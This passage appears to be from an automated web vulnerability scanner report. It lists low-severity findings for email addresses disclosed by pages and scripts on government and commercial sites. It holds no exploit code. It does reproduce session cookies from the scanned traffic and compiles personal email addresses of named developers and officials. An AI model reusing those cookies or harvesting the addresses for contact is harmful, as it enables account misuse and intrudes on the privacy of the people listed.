<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:tcssbsales@trustedcs.com?Subject=Security Blanket Sales Information" target="_parent" onclick="window.event.cancelBubble=true;" style="font-size: 10px;" title="tcssbsales@trustedcs.com">
...[SNIP]...
<a href="mailto:securityblanket@trustedCS.com?Subject=Security Blanket Technical Support" target="_parent" onclick="window.event.cancelBubble=true;" style="font-size: 10px;" title="SecurityBlanket@TrustedCS.com">
...[SNIP]...

19.29. http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchInput.asp

Issue detail

The following email address was disclosed in the response:

corporations@sos.ri.gov

Request

GET /CorpSearch/CorpSearchInput.asp HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28356
Content-Type: text/html
Cache-control: private

<script language="javascript">
//------------------------------------------------------------------------------------------------

function CS(EntryType,RefField,objField) {
window.txtTemp
...[SNIP]...
<a href = 'mailto: corporations@sos.ri.gov'>
...[SNIP]...

19.30. http://ucc.state.ri.us/loginsystem/login_form.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login_form.asp

Issue detail

The following email addresses were disclosed in the response:

corp_pin@sos.ri.gov
corp_tech@sos.ri.gov

Request

Response

19.31. http://www.211ri.org/js/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.211ri.org
Path:	/js/prototype.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/prototype.js HTTP/1.1
Host: www.211ri.org
Proxy-Connection: keep-alive
Referer: http://www.211ri.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 69575
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Feb 2009 14:15:53 GMT
Accept-Ranges: bytes
ETag: "fcc5e33f538cc91:c3c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 00:45:52 GMT

/* Prototype JavaScript framework, version 1.5.0_rc2
* (c) 2005, 2006 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For de
...[SNIP]...

19.32. http://www.akqa.com/contact/san-francisco previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/contact/san-francisco

Issue detail

The following email address was disclosed in the response:

info@akqa.com

Request

Response

19.33. http://www.akqa.com/library/js/jquery.jqtransform-1.1.custom.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.akqa.com
Path:	/library/js/jquery.jqtransform-1.1.custom.min.js

Issue detail

The following email addresses were disclosed in the response:

garmand@dfc-e.com
mvilaplana@dfc-e.com

Request

GET /library/js/jquery.jqtransform-1.1.custom.min.js HTTP/1.1
Host: www.akqa.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hzxworbdazhtnl55issguoqe

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 16 Jun 2011 09:42:06 GMT
Accept-Ranges: bytes
ETag: "0eb4ba792ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 12 Jul 2011 15:32:44 GMT
Content-Length: 14661

/*
*
* jqTransform
* by mathieu vilaplana mvilaplana@dfc-e.com
* Designer ghyslain armand garmand@dfc-e.com
*
*/

(function ($) {
var defaultOptions = {
preloadImg: true
};
var jqTransformImgPreloaded = false;
var jqTransformPreloadHoverFocusImg = function (strImgUrl) {

...[SNIP]...

19.34. http://www.ccbill.com/developers/security/vulnerability-reward-program-participation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ccbill.com
Path:	/developers/security/vulnerability-reward-program-participation.php

Issue detail

The following email addresses were disclosed in the response:

BugRewards@CCBill.com
BugRewards@ccbill.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html; charset=UTF-8
Content-Length: 10116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online Merchant Se
...[SNIP]...
<a href="mailto:BugRewards@ccbill.com">BugRewards@ccbill.com</a>
...[SNIP]...
<a href="mailto:BugRewards@CCBill.com">
...[SNIP]...
<a href="mailto:BugRewards@ccbill.com">BugRewards@ccbill.com</a>
...[SNIP]...

19.35. https://www.chase.com/online/includes/javascript/jquery.url.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/online/includes/javascript/jquery.url.js

Issue detail

The following email address was disclosed in the response:

mark@allmarkedup.com

Request

GET /online/includes/javascript/jquery.url.js HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/online/Checking/gift-card.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=J7K3TcxWLP29zSLjK11TchjW3ydQvwFRmsxsnT2L2Gzmn2NqR6jq!1272186516

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:08:42 GMT
Content-length: 6324
Content-type: application/x-javascript
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Sun, 03 Oct 2010 15:05:41 GMT
Etag: "18b4-4ca89bc5"
Accept-ranges: bytes

/* ===========================================================================
*
* JQuery URL Parser
* Version 1.0
* Parses URLs and provides easy access to information within them.
*
* Author: Mark Perkins
* Author email: mark@allmarkedup.com
*
* For full documentation and more go to http://projects.allmarkedup.com/jquery_url_parser/
*
* ---------------------------------------------------------------------------
*
* CREDITS:
*
* Pa
...[SNIP]...

19.36. http://www.citizencorps.gov/css/navDynamic.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.citizencorps.gov
Path:	/css/navDynamic.css

Issue detail

The following email address was disclosed in the response:

hejezi@monsanto.com

Request

GET /css/navDynamic.css HTTP/1.1
Host: www.citizencorps.gov
Proxy-Connection: keep-alive
Referer: http://www.citizencorps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:42 GMT
Server: Apache
Last-Modified: Mon, 13 Jun 2011 16:13:31 GMT
ETag: "7330004-d83-334be0c0"
Accept-Ranges: bytes
Content-Length: 3459
Content-Type: text/css

/* ------------------------------------------------------------
Title: AgProducts Navigation Styles
Author: Hilarie Jezik | hejezi@monsanto.com
Updated: May 18 2007
--------------------------------------------------------------- */

/* ------------------------------------------------------------
Top Nav
--------------------------------
...[SNIP]...

19.37. http://www.ct.gov/demhs/assets/templates/41/textsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ct.gov
Path:	/demhs/assets/templates/41/textsizer.js

Issue detail

The following email address was disclosed in the response:

txkang.REMOVETHIS@hotmail.com

Request

GET /demhs/assets/templates/41/textsizer.js HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/demhs/site/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: demhsNav%5FGID=; demhsNav=; demhs=LoginJumpBackTo=%2Fdemhs%2Fsite%2Fdefault%2Easp&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&TC=06105&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False

Response

HTTP/1.1 200 OK
Content-Length: 1270
Content-Type: application/x-javascript
Content-Location: http://www.ct.gov/demhs/assets/templates/41/textsizer.js
Last-Modified: Wed, 02 Jul 2008 17:47:28 GMT
Accept-Ranges: bytes
ETag: "36642ab26bdcc81:3c66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 00:39:30 GMT
Connection: close

/*------------------------------------------------------------
   Document Text Sizer- Copyright 2003 - Taewook Kang. All rights reserved.
   Coded by: Taewook Kang (txkang.REMOVETHIS@hotmail.com)
   Web Site: http://txkang.com
   Script featured on Dynamic Drive (http://www.dynamicdrive.com)

   Please retain this copyright notice in the script.
   License is granted to user to reuse this code on

...[SNIP]...

19.38. http://www.ct.gov/demhs/site/default.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ct.gov
Path:	/demhs/site/default.asp

Issue detail

The following email addresses were disclosed in the response:

Roopina.Bhatt@po.state.ct.us
roopina.bhatt@po.state.ct.us

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 00:39:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31115
Content-Type: text/html
Set-Cookie: demhs=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06105&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fdemhs%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/demhs
Set-Cookie: demhsNav=; path=/demhs
Set-Cookie: demhsNav%5FGID=; path=/demhs
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<meta HTTP-EQUIV="reply-To" CONTENT="Roopina.Bhatt@po.state.ct.us">
...[SNIP]...
<DSFCONTENT ID="1634" NAME="demhs" ABBREV="DEMHS" TITLE="Department of Emergency Management and Homeland Security" CONTACT="Roopina.Bhatt@po.state.ct.us" uuid="6F7E762D-35B6-4062-9415-9C54BA4BB880">
...[SNIP]...
<A class=noUnderline href="mailto:roopina.bhatt@po.state.ct.us">
...[SNIP]...

19.39. http://www.doit.ri.gov/directions/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doit.ri.gov
Path:	/directions/index.php

Issue detail

The following email address was disclosed in the response:

stevebe@gw.doa.state.ri.us

Request

GET /directions/index.php HTTP/1.1
Host: www.doit.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.doit.ri.gov/search/index.php/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=k6fe98tah1chc4hcr5dhu1bsc4

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15238

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <
...[SNIP]...
<META NAME="contactNetworkAddress" CONTENT="stevebe@gw.doa.state.ri.us">
...[SNIP]...

19.40. http://www.doit.ri.gov/news/projects/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doit.ri.gov
Path:	/news/projects/index.php

Issue detail

The following email address was disclosed in the response:

stevebe@gw.doa.state.ri.us

Request

GET /news/projects/index.php HTTP/1.1
Host: www.doit.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.doit.ri.gov/directions/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=k6fe98tah1chc4hcr5dhu1bsc4

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=iso-8859-1
Content-Length: 18342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <
...[SNIP]...
<META NAME="contactNetworkAddress" CONTENT="stevebe@gw.doa.state.ri.us">
...[SNIP]...

19.41. http://www.doit.ri.gov/search/index.php/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doit.ri.gov
Path:	/search/index.php/

Issue detail

The following email addresses were disclosed in the response:

stevebe@gw.doa.state.ri.us
telecom@DOIT.Ri.gov
telecom@DOIT.ri.gov

Request

GET /search/index.php/ HTTP/1.1
Host: www.doit.ri.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 21023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<META NAME="contactNetworkAddress" CONTENT="stevebe@gw.doa.state.ri.us">
...[SNIP]...
<a href="mailto:telecom@DOIT.Ri.gov">telecom@DOIT.ri.gov</a>
...[SNIP]...

19.42. http://www.doit.ri.gov/search/index.php/captcha.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.doit.ri.gov
Path:	/search/index.php/captcha.php

Issue detail

The following email addresses were disclosed in the response:

stevebe@gw.doa.state.ri.us
telecom@DOIT.Ri.gov
telecom@DOIT.ri.gov

Request

GET /search/index.php/captcha.php HTTP/1.1
Host: www.doit.ri.gov
Proxy-Connection: keep-alive
Referer: http://www.doit.ri.gov/search/index.php/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; PHPSESSID=k6fe98tah1chc4hcr5dhu1bsc4

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:35:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 21023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<META NAME="contactNetworkAddress" CONTENT="stevebe@gw.doa.state.ri.us">
...[SNIP]...
<a href="mailto:telecom@DOIT.Ri.gov">telecom@DOIT.ri.gov</a>
...[SNIP]...

19.43. http://www.fema.gov/css/text-styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fema.gov
Path:	/css/text-styles.css

Issue detail

The following email address was disclosed in the response:

FEMAWebteam@dhs.gov

Request

GET /css/text-styles.css HTTP/1.1
Host: www.fema.gov
Proxy-Connection: keep-alive
Referer: http://www.fema.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteType=desktop

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 12 Jul 2011 19:46:48 GMT
ETag: "8520006-46ef-4a7e48f747a00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 18159
Content-Type: text/css
Date: Wed, 13 Jul 2011 00:39:28 GMT
Connection: close

/* U.S. Dept of Homeland Security */
/* Standard Text Style CSS */
/* Contact FEMAWebteam@dhs.gov */
/* This CSS file updated on 9/23/08 */

/*************************************************************************
@Import CSS file
**********************************************
...[SNIP]...

19.44. http://www.homedepot.com/lithium-handling.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/lithium-handling.js

Issue detail

The following email address was disclosed in the response:

customercare@homedepot.com

Request

GET /lithium-handling.js HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Last-Modified: Mon, 09 Aug 2010 15:55:33 GMT
ETag: "106b-5fc1-beb6740"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 24513
Content-Type: text/html
Cache-Control: max-age=43195
Date: Tue, 12 Jul 2011 16:35:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xmlns="http://www
...[SNIP]...
<p>
If you have any questions, you can reach our web support team by email at customercare@homedepot.com
or by phone at 1-800-430-3376.</p>
...[SNIP]...

19.45. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/static/scripts/jquery/jquery.pubsub.js

Issue detail

The following email address was disclosed in the response:

dante@dojotoolkit.org

Request

GET /static/scripts/jquery/jquery.pubsub.js HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Last-Modified: Wed, 11 May 2011 03:30:16 GMT
ETag: "19f056-888-b0f04200"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 2184
Cache-Control: max-age=5512
Date: Tue, 12 Jul 2011 16:35:43 GMT
Connection: close

/*

   jQuery pub/sub plugin by Peter Higgins (dante@dojotoolkit.org)

   Loosely based on Dojo publish/subscribe API, limited in scope. Rewritten blindly.

   Original is (c) Dojo Foundation 2004-2010. Released under either AFL or new BSD, see:
   http://dojofoundation.org/
...[SNIP]...

19.46. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
